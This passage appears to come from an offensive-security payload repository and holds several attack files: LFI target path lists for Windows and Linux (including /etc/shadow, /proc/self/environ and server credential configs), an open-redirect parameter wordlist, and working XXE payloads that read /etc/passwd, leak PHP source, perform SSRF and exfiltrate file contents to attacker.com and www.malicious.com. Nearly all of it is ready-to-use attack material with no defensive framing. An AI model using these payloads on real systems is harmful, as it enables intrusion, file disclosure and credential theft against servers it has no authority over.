 6 | \xampp\phpMyAdmin\config.inc
 7 | \xampp\phpMyAdmin\phpinfo.php
 8 | \xampp\phpmyadmin\config.inc
 9 | \xampp\phpmyadmin\phpinfo.php
10 | \xampp\phpmyadmin\config.inc.php
11 | \xampp\phpMyAdmin\config.inc.php
12 | \xampp\apache\conf\httpd.conf
13 | \xampp\FileZillaFTP\FileZilla Server.xml
14 | \xampp\MercuryMail\mercury.ini
15 | \mysql\bin\my.ini
16 | \xampp\php\php.ini
17 | \xampp\phpMyAdmin\config.inc.php
18 | \xampp\tomcat\conf\tomcat-users.xml
19 | \xampp\tomcat\conf\web.xml
20 | \xampp\sendmail\sendmail.ini
21 | \xampp\webalizer\webalizer.conf
22 | \xampp\webdav\webdav.txt
23 | \xampp\apache\logs\error.log
24 | \xampp\apache\logs\access.log
25 | \xampp\FileZillaFTP\Logs
26 | \xampp\FileZillaFTP\Logs\error.log
27 | \xampp\FileZillaFTP\Logs\access.log
28 | \xampp\MercuryMail\LOGS\error.log
29 | \xampp\MercuryMail\LOGS\access.log
30 | \xampp\mysql\data\mysql.err
31 | \xampp\sendmail\sendmail.log
32 | \apache\log\error.log
33 | \apache\log\access.log
34 | \apache\log\error_log
35 | \apache\log\access_log
36 | \apache2\log\error.log
37 | \apache2\log\access.log
38 | \apache2\log\error_log
39 | \apache2\log\access_log
40 | \log\error.log
41 | \log\access.log
42 | \log\error_log
43 | \log\access_log
44 | \apache\logs\error.log
45 | \apache\logs\access.log
46 | \apache\logs\error_log
47 | \apache\logs\access_log
48 | \apache2\logs\error.log
49 | \apache2\logs\access.log
50 | \apache2\logs\error_log
51 | \apache2\logs\access_log
52 | \logs\error.log
53 | \logs\access.log
54 | \logs\error_log
55 | \logs\access_log
56 | \log\httpd\access_log
57 | \log\httpd\error_log
58 | \logs\httpd\access_log
59 | \logs\httpd\error_log
60 | \opt\xampp\logs\access_log
61 | \opt\xampp\logs\error_log
62 | \opt\xampp\logs\access.log
63 | \opt\xampp\logs\error.log
64 | \Program Files\Apache Group\Apache\logs\access.log
65 | \Program Files\Apache Group\Apache\logs\error.log
66 | \Program Files\Apache Group\Apache\conf\httpd.conf
67 | \Program Files\Apache Group\Apache2\conf\httpd.conf
68 | \Program Files\xampp\apache\conf\httpd.conf
69 | 


--------------------------------------------------------------------------------
/Attacks/XXE/Payloads.txt:
--------------------------------------------------------------------------------
 1 | Classic -------------------------
 2 | 
 3 | <?xml version="1.0"?>
 4 | <!DOCTYPE data [
 5 | <!ELEMENT data (#ANY)>
 6 | <!ENTITY file SYSTEM "file:///etc/passwd">
 7 | ]>
 8 | <data>&file;</data>
 9 | 
10 | 
11 | <?xml version="1.0" encoding="ISO-8859-1"?>
12 |   <!DOCTYPE foo [  
13 |   <!ELEMENT foo ANY >
14 |   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
15 |   
16 |   
17 | <?xml version="1.0" encoding="ISO-8859-1"?>
18 | <!DOCTYPE foo [  
19 |   <!ELEMENT foo ANY >
20 |   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
21 |   
22 |   PHP Wrapper inside XXE ---------------------
23 |   
24 | <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
25 | <contacts>
26 |   <contact>
27 |     <name>Jean &xxe; Dupont</name>
28 |     <phone>00 11 22 33 44</phone>
29 |     <adress>42 rue du CTF</adress>
30 |     <zipcode>75000</zipcode>
31 |     <city>Paris</city>
32 |   </contact>
33 | </contacts>
34 | 
35 | 
36 | <?xml version="1.0" encoding="ISO-8859-1"?>
37 | <!DOCTYPE foo [
38 | <!ELEMENT foo ANY >
39 | <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
40 | ]>
41 | <foo>&xxe;</foo>
42 | 
43 | XInclude attacks -------------------------------------
44 | 
45 | <foo xmlns:xi="http://www.w3.org/2001/XInclude">
46 | <xi:include parse="text" href="file:///etc/passwd"/></foo>
47 | 
48 | Exploiting XXE to perform SSRF attacks ----------------------------
49 | 
50 | <?xml version="1.0" encoding="ISO-8859-1"?>
51 | <!DOCTYPE foo [
52 | <!ELEMENT foo ANY >
53 | <!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
54 | ]>
55 | <foo>&xxe;</foo>
56 | 
57 | Error Based XXE ----------------------
58 | 
59 | Payload to trigger the XXE ---
60 | 
61 | <?xml version="1.0" ?>
62 | <!DOCTYPE message [
63 |     <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
64 |     %ext;
65 | ]>
66 | <message></message>
67 | 
68 | Contents of ext.dtd -------
69 | 
70 | <!ENTITY % file SYSTEM "file:///etc/passwd">
71 | <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
72 | %eval;
73 | %error;
74 | 
75 | Blind XXE
76 | 
77 | <?xml version="1.0" ?>
78 | <!DOCTYPE root [
79 | <!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
80 | ]>
81 | <r></r>
82 | 
83 | <?xml version="1.0" encoding="ISO-8859-1"?>
84 | <!DOCTYPE foo [
85 | <!ELEMENT foo ANY >
86 | <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
87 | <!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
88 | ]
89 | >
90 | <foo>&callhome;</foo>
91 | 


--------------------------------------------------------------------------------
/Attacks/Open-Redirect/Interesting-url-params.txt:
--------------------------------------------------------------------------------
  1 | &redir=
  2 | &url=
  3 | &redirect=
  4 | &u=
  5 | &next=
  6 | &out=
  7 | &view=
  8 | &destination=
  9 | &redirect_url=
 10 | &redirect_uri=
 11 | &image_url=
 12 | &go=
 13 | &return=
 14 | &returnTo=
 15 | &return_to=
 16 | &checkout_url=
 17 | &navigation=
 18 | &open=
 19 | &site=
 20 | &page=
 21 | &ret=
 22 | &r2=
 23 | ?r2=
 24 | ?img=
 25 | ?r=
 26 | ?URL=
 27 | ?redirectBack=
 28 | ?AuthState=
 29 | ?referer=
 30 | ?redir=
 31 | ?l=
 32 | ?aspxerrorpath=
 33 | ?image_path=
 34 | ?ActionCodeURL=
 35 | ?link=
 36 | ?q=
 37 | ?location=
 38 | ?ReturnUrl=
 39 | ?uri=
 40 | ?referrer=
 41 | ?returnUrl=
 42 | ?forward=
 43 | ?file=
 44 | ?rb=
 45 | ?end_display=
 46 | ?urlact=
 47 | ?from=
 48 | ?goto=
 49 | ?path=
 50 | ?redirect_url=
 51 | ?old=
 52 | ?pathlocation=
 53 | ?successTarget=
 54 | ?returnURL=
 55 | ?urlsito=
 56 | ?newurl=
 57 | ?Url=
 58 | ?back=
 59 | ?retour=
 60 | ?odkazujuca_linka=
 61 | ?r_link=
 62 | ?cur_url=
 63 | ?H_name=
 64 | ?ref=
 65 | ?topic=
 66 | ?resource=
 67 | ?returnTo=
 68 | ?home=
 69 | ?node=
 70 | ?sUrl=
 71 | ?href=
 72 | ?linkurl=
 73 | ?returnto=
 74 | ?redirecturl=
 75 | ?SL=
 76 | ?st=
 77 | ?errorUrl=
 78 | ?media=
 79 | ?destination=
 80 | ?targeturl=
 81 | ?return_to=
 82 | ?cancel_url=
 83 | ?doc=
 84 | ?GO=
 85 | ?ReturnTo=
 86 | ?anything=
 87 | ?FileName=
 88 | ?logoutRedirectURL=
 89 | ?list=
 90 | ?startUrl=
 91 | ?service=
 92 | ?redirect_to=
 93 | ?end_url=
 94 | ?_next=
 95 | ?noSuchEntryRedirect=
 96 | ?context=
 97 | ?returnurl=
 98 | ?ref_url=
 99 | ?redir=
100 | ?url=
101 | ?redirect=
102 | ?u=
103 | ?next=
104 | ?out=
105 | ?view=
106 | ?destination=
107 | ?redirect_url=
108 | ?redirect_uri=
109 | ?image_url=
110 | ?go=
111 | ?return=
112 | ?returnTo=
113 | ?return_to=
114 | ?checkout_url=
115 | ?navigation=
116 | ?open=
117 | ?site=
118 | ?page=
119 | ?ret=
120 | &r2=
121 | &img=
122 | &r=
123 | &URL=
124 | &redirectBack=
125 | &AuthState=
126 | &referer=
127 | &redir=
128 | &l=
129 | &aspxerrorpath=
130 | &image_path=
131 | &ActionCodeURL=
132 | &link=
133 | &q=
134 | &location=
135 | &ReturnUrl=
136 | &uri=
137 | &referrer=
138 | &returnUrl=
139 | &forward=
140 | &file=
141 | &rb=
142 | &end_display=
143 | &urlact=
144 | &from=
145 | &goto=
146 | &path=
147 | &redirect_url=
148 | &old=
149 | &pathlocation=
150 | &successTarget=
151 | &returnURL=
152 | &urlsito=
153 | &newurl=
154 | &Url=
155 | &back=
156 | &retour=
157 | &odkazujuca_linka=
158 | &r_link=
159 | &cur_url=
160 | &H_name=
161 | &ref=
162 | &topic=
163 | &resource=
164 | &returnTo=
165 | &home=
166 | &node=
167 | &sUrl=
168 | &href=
169 | &linkurl=
170 | &returnto=
171 | &redirecturl=
172 | &SL=
173 | &st=
174 | &errorUrl=
175 | &media=
176 | &destination=
177 | &targeturl=
178 | &return_to=
179 | &cancel_url=
180 | &doc=
181 | &GO=
182 | &ReturnTo=
183 | &anything=
184 | &FileName=
185 | &logoutRedirectURL=
186 | &list=
187 | &startUrl=
188 | &service=
189 | &redirect_to=
190 | &end_url=
191 | &_next=
192 | &noSuchEntryRedirect=
193 | &context=
194 | &returnurl=
195 | &ref_url=
196 | /?page=
197 | /index.php?ret=
198 | /analytics/hit.php?r2=
199 | /api/thumbnail?img=
200 | /e.html?u=
201 | /actions/act_continueapplication.cfm?r=
202 | /redirect2/?url=
203 | /Shibboleth.sso/Logout?return=
204 | /ui/clear-selected/?next=
205 | /Home/Redirect?url=
206 | /jobs/?l=
207 | /Error.aspx?aspxerrorpath=
208 | /r.php?u=
209 | /services/logo_handler.ashx?image_path=
210 | /AddProduct.aspx?ActionCodeURL=
211 | /tools/login/default.asp?page=
212 | /spip.php?url=
213 | /usermanagement/mailGeneratedPassword?referer=
214 | /?return=
215 | /?redir=
216 | /simplesaml/module.php/core/loginuserpass.php?AuthState=
217 | /out.php?url=
218 | /affiche.php?uri=
219 | /redirector.php?url=
220 | /cgi/set_lang?referrer=
221 | /blog/click?url=
222 | /site.php?url=
223 | /download2.php?file=
224 | /jump.php?url=
225 | /redirect/?redirect=
226 | /admin/track/track?redirect=
227 | /switch.php?rb=
228 | /php-scripts/form-handler.php?end_display=
229 | /cg/rk/?url=
230 | /tosite.php?url=
231 | /cambioidioma.php?urlact=
232 | /accueil/spip.php?url=
233 | /IRB/sd/Rooms/RoomComponents/LoginView/GetSessionAndBack?redirectBack=
234 | /search?q=
235 | /default.aspx?URL=
236 | /initiate-sso-login/?redirect_url=
237 | /module.php/core/loginuserpass.php?AuthState=
238 | /authentication/check_login?old=
239 | /RedirectToDoc.aspx?URL=
240 | /shop/bannerhit.php?url=
241 | /acceptcookies/?ReturnUrl=
242 | /index.php?url=
243 | /publang?url=
244 | /home/helperpage?url=
245 | /widgets.aspx?url=
246 | /_lang/en?next=
247 | /application/en?url=
248 | /common/topcorm.do?pathlocation=
249 | /main/action?successTarget=
250 | /Videos/SetCulture?returnURL=
251 | /Localize/ChangeLang?returnUrl=
252 | /_goToSite.asp?urlsito=
253 | /redir?url=
254 | /admin/auth/logined?redirect=
255 | /linkforward?forward=
256 | /modules/babel/redirect.php?newurl=
257 | /umbraco/Surface/LanguageSurface/ChangeLanguage?Url=
258 | /langswitcher.php?url=
259 | /redirect/?url=
260 | /i18n/i18n_user_currencies/change_currency?back=
261 | /accessibilite/textBackUp/?retour=
262 | /fncBox.php?url=
263 | /all4shop-akcie.php?odkazujuca_linka=
264 | /openurl.php?url=
265 | /te3/out.php?u=
266 | /utils/set_language.html?return_url=
267 | /trigger.php?r_link=
268 | /home/lng?cur_url=
269 | /goto?url=
270 | /o.php?url=
271 | /link-master/19/follow?link=
272 | /hack.php?H_name=
273 | /bmad/namhoc.php?return=
274 | /maven/stats.asp?ref=
275 | /Main/WebHome?topic=
276 | /bin/fusion/imsLogin?resource=
277 | /languechange.aspx?url=
278 | /bloques/bannerclick.php?url=
279 | /changesiteversion-full?referer=
280 | /out.php?link=
281 | /bgpage?r=
282 | /signout?returnTo=
283 | /switch_lang.php?return_url=
284 | /nousername.php?redir=
285 | /i/logout?return=
286 | /util_goto_detail_home.cfm?home=
287 | /misc/oldmenu.html?from=
288 | /click.php?url=
289 | /bitrix/rdc/?goto=
290 | /?node=
291 | /setLanguage.php?return=
292 | /redirect/ad?url=
293 | /redirect.php?sUrl=
294 | /redirect?url=
295 | /url?url=
296 | 


--------------------------------------------------------------------------------
/Attacks/LFI/Linux/Interesting-Files.txt:
--------------------------------------------------------------------------------
  1 | /etc/passwd
  2 | /logs/access_log
  3 | /logs/error_log
  4 | /etc/shadow
  5 | /etc/group
  6 | proc/self/environ
  7 | /proc/self/environ
  8 | /proc/self/cmdline
  9 | /proc/self/stat
 10 | /proc/self/status
 11 | /proc/self/fd/0
 12 | /proc/self/fd/1
 13 | /proc/self/fd/2
 14 | /proc/self/fd/3
 15 | /proc/self/fd/4
 16 | /proc/self/fd/5
 17 | /proc/self/fd/6
 18 | /proc/self/fd/7
 19 | /proc/self/fd/8
 20 | /proc/self/fd/9
 21 | /proc/self/fd/10
 22 | /proc/self/fd/11
 23 | /proc/self/fd/12
 24 | /proc/self/fd/13
 25 | /proc/self/fd/14
 26 | /proc/self/fd/15
 27 | /proc/self/fd/16
 28 | /proc/self/fd/17
 29 | /proc/self/fd/18
 30 | /proc/self/fd/19
 31 | /proc/self/fd/20
 32 | /proc/self/fd/21
 33 | /proc/self/fd/22
 34 | /proc/self/fd/23
 35 | /proc/self/fd/24
 36 | /proc/self/fd/25
 37 | /proc/self/fd/26
 38 | /proc/self/fd/27
 39 | /proc/self/fd/28
 40 | /proc/self/fd/29
 41 | /proc/self/fd/30
 42 | /proc/self/fd/31
 43 | /proc/self/fd/32
 44 | /proc/self/fd/33
 45 | /proc/self/fd/34
 46 | /proc/self/fd/35
 47 | /var/cpanel/cpanel.config
 48 | /etc/security/group
 49 | /etc/security/passwd
 50 | /etc/security/user
 51 | /etc/security/environ
 52 | /etc/security/limits
 53 | /usr/lib/security/mkuser.default
 54 | /apache/logs/access.log
 55 | /apache/logs/error.log
 56 | /etc/httpd/logs/acces_log
 57 | /etc/httpd/logs/error_log
 58 | /var/www/logs/access_log
 59 | /usr/local/apache/logs/access_log
 60 | /var/log/apache/access_log
 61 | /var/log/apache2/access_log
 62 | /var/log/access_log
 63 | /var/log/access.log
 64 | /var/www/logs/error_log
 65 | /var/www/logs/error.log
 66 | /usr/local/apache/logs/error_log
 67 | /usr/local/apache/logs/error.log
 68 | /var/log/apache/error_log
 69 | /var/log/apache2/error_log
 70 | /var/log/apache/error.log
 71 | /var/log/apache2/error.log
 72 | /var/log/error_log
 73 | /var/log/error.log
 74 | /var/log/httpd/access_log
 75 | /var/log/httpd/error_log
 76 | /apache2/logs/error.log
 77 | /apache2/logs/access.log
 78 | /logs/error.log
 79 | /logs/access.log
 80 | /etc/httpd/logs/acces.log
 81 | /etc/httpd/logs/error.log
 82 | /usr/local/apache/logs/access.log
 83 | /usr/local/apache2/logs/access_log
 84 | /usr/local/apache2/logs/access.log
 85 | /usr/local/apache2/logs/error_log
 86 | /usr/local/apache2/logs/error.log
 87 | /var/www/logs/access.log
 88 | /var/log/httpd/access.log
 89 | /var/log/httpd/error.log
 90 | /var/log/apache/access.log
 91 | /var/log/apache2/access.log
 92 | /opt/lampp/logs/access_log
 93 | /opt/lampp/logs/error_log
 94 | /opt/xampp/logs/access_log
 95 | /opt/xampp/logs/error_log
 96 | /opt/lampp/logs/access.log
 97 | /opt/lampp/logs/error.log
 98 | /opt/xampp/logs/access.log
 99 | /opt/xampp/logs/error.log
100 | /Program Files\Apache Group\Apache\logs\access.log
101 | /Program Files\Apache Group\Apache\logs\error.log
102 | /logs/access_log
103 | /logs/error_log
104 | /usr/local/apache/conf/httpd.conf
105 | /usr/local/apache2/conf/httpd.conf
106 | /etc/httpd/conf/httpd.conf
107 | /etc/apache/conf/httpd.conf
108 | /usr/local/etc/apache/conf/httpd.conf
109 | /etc/apache2/httpd.conf
110 | /usr/local/apache/httpd.conf
111 | /usr/local/apache2/httpd.conf
112 | /usr/local/httpd/conf/httpd.conf
113 | /usr/local/etc/apache2/conf/httpd.conf
114 | /usr/local/etc/httpd/conf/httpd.conf
115 | /usr/apache2/conf/httpd.conf
116 | /usr/apache/conf/httpd.conf
117 | /usr/local/apps/apache2/conf/httpd.conf
118 | /usr/local/apps/apache/conf/httpd.conf
119 | /etc/apache2/conf/httpd.conf
120 | /etc/http/conf/httpd.conf
121 | /etc/httpd/httpd.conf
122 | /etc/http/httpd.conf
123 | /etc/httpd.conf
124 | /opt/apache/conf/httpd.conf
125 | /opt/apache2/conf/httpd.conf
126 | /var/www/conf/httpd.conf
127 | /private/etc/httpd/httpd.conf
128 | /private/etc/httpd/httpd.conf.default
129 | /Volumes/webBackup/opt/apache2/conf/httpd.conf
130 | /Volumes/webBackup/private/etc/httpd/httpd.conf
131 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default
132 | /Program Files\Apache Group\Apache\conf\httpd.conf
133 | /Program Files\Apache Group\Apache2\conf\httpd.conf
134 | /Program Files\xampp\apache\conf\httpd.conf
135 | /usr/local/php/httpd.conf.php
136 | /usr/local/php4/httpd.conf.php
137 | /usr/local/php5/httpd.conf.php
138 | /usr/local/php/httpd.conf
139 | /usr/local/php4/httpd.conf
140 | /usr/local/php5/httpd.conf
141 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
142 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
143 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
144 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
145 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
146 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
147 | /usr/local/etc/apache/vhosts.conf
148 | /etc/php.ini
149 | /bin/php.ini
150 | /etc/httpd/php.ini
151 | /usr/lib/php.ini
152 | /usr/lib/php/php.ini
153 | /usr/local/etc/php.ini
154 | /usr/local/lib/php.ini
155 | /usr/local/php/lib/php.ini
156 | /usr/local/php4/lib/php.ini
157 | /usr/local/php5/lib/php.ini
158 | /usr/local/apache/conf/php.ini
159 | /etc/php4.4/fcgi/php.ini
160 | /etc/php4/apache/php.ini
161 | /etc/php4/apache2/php.ini
162 | /etc/php5/apache/php.ini
163 | /etc/php5/apache2/php.ini
164 | /etc/php/php.ini
165 | /etc/php/php4/php.ini
166 | /etc/php/apache/php.ini
167 | /etc/php/apache2/php.ini
168 | /web/conf/php.ini
169 | /usr/local/Zend/etc/php.ini
170 | /opt/xampp/etc/php.ini
171 | /var/local/www/conf/php.ini
172 | /etc/php/cgi/php.ini
173 | /etc/php4/cgi/php.ini
174 | /etc/php5/cgi/php.ini
175 | /php5\php.ini
176 | /php4\php.ini
177 | /php\php.ini
178 | /PHP\php.ini
179 | /WINDOWS\php.ini
180 | /WINNT\php.ini
181 | /apache\php\php.ini
182 | /xampp\apache\bin\php.ini
183 | /NetServer\bin\stable\apache\php.ini
184 | /home2\bin\stable\apache\php.ini
185 | /home\bin\stable\apache\php.ini
186 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
187 | /usr/local/cpanel/logs
188 | /usr/local/cpanel/logs/stats_log
189 | /usr/local/cpanel/logs/access_log
190 | /usr/local/cpanel/logs/error_log
191 | /usr/local/cpanel/logs/license_log
192 | /usr/local/cpanel/logs/login_log
193 | /var/log/mysql/mysql-bin.log
194 | /var/log/mysql.log
195 | /var/log/mysqlderror.log
196 | /var/log/mysql/mysql.log
197 | /var/log/mysql/mysql-slow.log
198 | /var/mysql.log
199 | /var/lib/mysql/my.cnf
200 | /etc/mysql/my.cnf
201 | /etc/my.cnf
202 | /etc/logrotate.d/proftpd
203 | /www/logs/proftpd.system.log
204 | /var/log/proftpd
205 | /etc/proftp.conf
206 | /etc/protpd/proftpd.conf
207 | /etc/vhcs2/proftpd/proftpd.conf
208 | /etc/proftpd/modules.conf
209 | /var/log/vsftpd.log
210 | /etc/vsftpd.chroot_list
211 | /etc/logrotate.d/vsftpd.log
212 | /etc/vsftpd/vsftpd.conf
213 | /etc/vsftpd.conf
214 | /etc/chrootUsers
215 | /var/log/xferlog
216 | /var/adm/log/xferlog
217 | /etc/wu-ftpd/ftpaccess
218 | /etc/wu-ftpd/ftphosts
219 | /etc/wu-ftpd/ftpusers
220 | /usr/sbin/pure-config.pl
221 | /usr/etc/pure-ftpd.conf
222 | /etc/pure-ftpd/pure-ftpd.conf
223 | /usr/local/etc/pure-ftpd.conf
224 | /usr/local/etc/pureftpd.pdb
225 | /usr/local/pureftpd/etc/pureftpd.pdb
226 | /usr/local/pureftpd/sbin/pure-config.pl
227 | /usr/local/pureftpd/etc/pure-ftpd.conf
228 | /etc/pure-ftpd.conf
229 | /etc/pure-ftpd/pure-ftpd.pdb
230 | /etc/pureftpd.pdb
231 | /etc/pureftpd.passwd
232 | /etc/pure-ftpd/pureftpd.pdb
233 | /usr/ports/ftp/pure-ftpd/
234 | /usr/ports/net/pure-ftpd/
235 | /usr/pkgsrc/net/pureftpd/
236 | /usr/ports/contrib/pure-ftpd/
237 | /var/log/pure-ftpd/pure-ftpd.log
238 | /logs/pure-ftpd.log
239 | /var/log/pureftpd.log
240 | /var/log/ftp-proxy/ftp-proxy.log
241 | /var/log/ftp-proxy
242 | /var/log/ftplog
243 | /etc/logrotate.d/ftp
244 | /etc/ftpchroot
245 | /etc/ftphosts
246 | /var/log/exim_mainlog
247 | /var/log/exim/mainlog
248 | /var/log/maillog
249 | /var/log/exim_paniclog
250 | /var/log/exim/paniclog
251 | /var/log/exim/rejectlog
252 | /var/log/exim_rejectlog
253 | /home/users/web/b1286/ipg.roksbox/home/index.php
254 | /etc/issue
255 | /etc/motd
256 | /etc/passwd
257 | /etc/passwd
258 | /etc/shadow
259 | /etc/group
260 | /etc/security/group
261 | /etc/security/passwd
262 | /etc/security/user
263 | /etc/security/environ
264 | /etc/security/limits
265 | /usr/lib/security/mkuser.default
266 | /apache/logs/error.log
267 | /apache/logs/access.log
268 | /etc/httpd/logs/access.log
269 | /etc/httpd/logs/error_log
270 | /var/www/logs/access_log
271 | /var/www/logs/error.log
272 | /usr/local/apache/logs/access_log
273 | /usr/local/apache/logs/access.log
274 | /usr/local/apache/logs/error_log
275 | /usr/local/apache/logs/error.log
276 | /var/log/apache/access_log
277 | /var/log/apache2/access_log
278 | /var/log/apache/error.log
279 | /var/log/apache2/error.log
280 | /var/log/access_log
281 | /var/log/access.log
282 | /var/www/logs/error_log
283 | /var/www/logs/error.log
284 | /var/log/httpd/access_log
285 | /var/log/httpd/error_log
286 | /var/log/httpd/access_log
287 | /var/log/httpd/error_log
288 | /apache2/logs/error.log
289 | /apache2/logs/access.log
290 | /logs/error.log
291 | /logs/access.log
292 | /logs/error_log
293 | /logs/access_log
294 | /usr/local/apache2/logs/access_log
295 | /usr/local/apache2/logs/access.log
296 | /usr/local/apache2/logs/error_log
297 | /usr/local/apache2/logs/error.log
298 | /opt/lampp/logs/access_log
299 | /opt/lampp/logs/error_log
300 | /opt/xampp/logs/access_log
301 | /opt/xampp/logs/error_log
302 | /opt/lampp/logs/access.log
303 | /opt/lampp/logs/error.log
304 | /opt/xampp/logs/access.log
305 | /opt/xampp/logs/error.log
306 | /Program Files\Apache Group\Apache\logs\access.log
307 | /Program Files\Apache Group\Apache\logs\error.log
308 | /usr/local/apache/conf/httpd.conf
309 | /usr/local/apache2/conf/httpd.conf
310 | /etc/httpd/conf/httpd.conf
311 | /etc/apache/conf/httpd.conf
312 | /usr/local/etc/apache/conf/httpd.conf
313 | /etc/apache2/httpd.conf
314 | /usr/local/apache/conf/httpd.conf
315 | /usr/local/apache2/conf/httpd.conf
316 | /usr/local/apache/httpd.conf
317 | /usr/local/apache2/httpd.conf
318 | /usr/local/httpd/conf/httpd.conf
319 | /usr/local/etc/apache/conf/httpd.conf
320 | /usr/local/etc/apache2/conf/httpd.conf
321 | /usr/local/etc/httpd/conf/httpd.conf
322 | /usr/apache2/conf/httpd.conf
323 | /usr/apache/conf/httpd.conf
324 | /usr/local/apps/apache2/conf/httpd.conf
325 | /usr/local/apps/apache/conf/httpd.conf
326 | /etc/apache/conf/httpd.conf
327 | /etc/apache2/conf/httpd.conf
328 | /etc/httpd/conf/httpd.conf
329 | /etc/http/conf/httpd.conf
330 | /etc/apache2/httpd.conf
331 | /etc/httpd/httpd.conf
332 | /etc/http/httpd.conf
333 | /etc/httpd.conf
334 | /opt/apache/conf/httpd.conf
335 | /opt/apache2/conf/httpd.conf
336 | /var/www/conf/httpd.conf
337 | /private/etc/httpd/httpd.conf
338 | /private/etc/httpd/httpd.conf.default
339 | /Volumes/webBackup/opt/apache2/conf/httpd.conf
340 | /Volumes/webBackup/private/etc/httpd/httpd.conf
341 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default
342 | /Program Files\Apache Group\Apache\conf\httpd.conf
343 | /Program Files\Apache Group\Apache2\conf\httpd.conf
344 | /Program Files\xampp\apache\conf\httpd.conf
345 | /usr/local/php/httpd.conf.php
346 | /usr/local/php4/httpd.conf.php
347 | /usr/local/php5/httpd.conf.php
348 | /usr/local/php/httpd.conf
349 | /usr/local/php4/httpd.conf
350 | /usr/local/php5/httpd.conf
351 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
352 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
353 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
354 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
355 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
356 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
357 | /usr/local/etc/apache/vhosts.conf
358 | /etc/php.ini
359 | /bin/php.ini
360 | /etc/httpd/php.ini
361 | /usr/lib/php.ini
362 | /usr/lib/php/php.ini
363 | /usr/local/etc/php.ini
364 | /usr/local/lib/php.ini
365 | /usr/local/php/lib/php.ini
366 | /usr/local/php4/lib/php.ini
367 | /usr/local/php5/lib/php.ini
368 | /usr/local/apache/conf/php.ini
369 | /etc/php4.4/fcgi/php.ini
370 | /etc/php4/apache/php.ini
371 | /etc/php4/apache2/php.ini
372 | /etc/php5/apache/php.ini
373 | /etc/php5/apache2/php.ini
374 | /etc/php/php.ini
375 | /etc/php/php4/php.ini
376 | /etc/php/apache/php.ini
377 | /etc/php/apache2/php.ini
378 | /web/conf/php.ini
379 | /usr/local/Zend/etc/php.ini
380 | /opt/xampp/etc/php.ini
381 | /var/local/www/conf/php.ini
382 | /etc/php/cgi/php.ini
383 | /etc/php4/cgi/php.ini
384 | /etc/php5/cgi/php.ini
385 | /php5\php.ini
386 | /php4\php.ini
387 | /php\php.ini
388 | /PHP\php.ini
389 | /WINDOWS\php.ini
390 | /WINNT\php.ini
391 | /apache\php\php.ini
392 | /xampp\apache\bin\php.ini
393 | /NetServer\bin\stable\apache\php.ini
394 | /home2\bin\stable\apache\php.ini
395 | /home\bin\stable\apache\php.ini
396 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
397 | /usr/local/cpanel/logs
398 | /usr/local/cpanel/logs/stats_log
399 | /usr/local/cpanel/logs/access_log
400 | /usr/local/cpanel/logs/error_log
401 | /usr/local/cpanel/logs/license_log
402 | /usr/local/cpanel/logs/login_log
403 | /usr/local/cpanel/logs/stats_log
404 | /var/cpanel/cpanel.config
405 | /var/log/mysql/mysql-bin.log
406 | /var/log/mysql.log
407 | /var/log/mysqlderror.log
408 | /var/log/mysql/mysql.log
409 | /var/log/mysql/mysql-slow.log
410 | /var/mysql.log
411 | /var/lib/mysql/my.cnf
412 | /etc/mysql/my.cnf
413 | /etc/my.cnf
414 | /etc/logrotate.d/proftpd
415 | /www/logs/proftpd.system.log
416 | /var/log/proftpd
417 | /etc/proftp.conf
418 | /etc/protpd/proftpd.conf
419 | /etc/vhcs2/proftpd/proftpd.conf
420 | /etc/proftpd/modules.conf
421 | /var/log/vsftpd.log
422 | /etc/vsftpd.chroot_list
423 | /etc/logrotate.d/vsftpd.log
424 | /etc/vsftpd/vsftpd.conf
425 | /etc/vsftpd.conf
426 | /etc/chrootUsers
427 | /var/log/xferlog
428 | /var/adm/log/xferlog
429 | /etc/wu-ftpd/ftpaccess
430 | /etc/wu-ftpd/ftphosts
431 | /etc/wu-ftpd/ftpusers
432 | /usr/sbin/pure-config.pl
433 | /usr/etc/pure-ftpd.conf
434 | /etc/pure-ftpd/pure-ftpd.conf
435 | /usr/local/etc/pure-ftpd.conf
436 | /usr/local/etc/pureftpd.pdb
437 | /usr/local/pureftpd/etc/pureftpd.pdb
438 | /usr/local/pureftpd/sbin/pure-config.pl
439 | /usr/local/pureftpd/etc/pure-ftpd.conf
440 | /etc/pure-ftpd.conf
441 | /etc/pure-ftpd/pure-ftpd.pdb
442 | /etc/pureftpd.pdb
443 | /etc/pureftpd.passwd
444 | /etc/pure-ftpd/pureftpd.pdb
445 | /usr/ports/ftp/pure-ftpd/
446 | /usr/ports/net/pure-ftpd/
447 | /usr/pkgsrc/net/pureftpd/
448 | /usr/ports/contrib/pure-ftpd/
449 | /var/log/pure-ftpd/pure-ftpd.log
450 | /logs/pure-ftpd.log
451 | /var/log/pureftpd.log
452 | /var/log/ftp-proxy/ftp-proxy.log
453 | /var/log/ftp-proxy
454 | /var/log/ftplog
455 | /etc/logrotate.d/ftp
456 | /etc/ftpchroot
